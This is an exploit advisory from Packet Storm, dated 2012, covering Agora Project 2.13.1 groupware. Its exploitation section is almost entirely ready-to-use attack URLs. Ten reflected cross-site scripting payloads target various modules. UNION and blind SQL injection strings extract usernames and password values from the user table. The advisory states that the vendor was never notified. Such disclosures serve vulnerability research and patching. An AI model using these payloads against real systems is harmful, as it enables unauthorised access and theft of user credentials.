exploit the possibilities

Agora Project 2.13.1 Cross Site Scripting / SQL Injection

Agora Project 2.13.1 Cross Site Scripting / SQL Injection
Posted Jun 23, 2012
Authored by Chris Russell

Agora Project version 2.13.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 7ac823ee365149463dcdab1743f17b2d

Agora Project 2.13.1 Cross Site Scripting / SQL Injection

Change Mirror Download
###################################################################
Agora Project 2.13.1 Multiple Vulnerabilities
###################################################################

Release Date Bug. 15-06-2012
Vendor Notification Date. Never
Product. Agora project
Affected versions. 2.13.1 and less
Type. No Commercial
Attack Vector. XSS, SQLi, BSQLi
Solution Status. unpublished
CVE reference. Not yet assigned
Download http://www.agora-project.net/divers/download.php
Demo http://www.agora-project.net/demo/

I. BACKGROUND

Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL).
It contains many modules: File Manager (with versioning), Calendars (with resource calendars),
Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc.

II. DESCRIPTION

vulnerabilities are XSS, SQLi, BSQLi


III. EXPLOITATION

XSS
192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>
192.168.0.1/module_agenda/evenement.php?id_evenement="><script>alert('xss')</script>
192.168.0.1/module_contact/contact.php?id_contact="><script>alert('xss')</script>
192.168.0.1/module_contact/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_tache/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_agenda/index.php?printmode="><script>alert('xss')</script>
192.168.0.1/module_lien/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_forum/index.php?theme="><script>alert('xss')</script>
192.168.0.1/module_fichier/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_tableau_bord/index.php?tdb_periode="><script>alert('xss')</script>

SQLi
To exploit minimum visit to "public" space
192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select pass FROM gt_utilisateur WHERE 1 AND '1'='1

BSQLi
To exploit minimum visit to "public" space
192.168.0.1/module_tache/tache.php?id_tache=1'+and+substring(@@version,1,1)='5
192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+1+from+gt_utilisateur+limit+0,1)='1

192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,pass),1,1)+from+gt_utilisateur+limit+0,1)='1
192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,nom),1,1)+from+gt_utilisateur+limit+0,1)='1

192.168.0.1/module_tache/tache.php?id_tache=1'and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))>'0'>'0
192.168.0.1/module_tache/tache.php?id_tache=1'+and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))='110
...





Discovered by.
Chris Russell

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close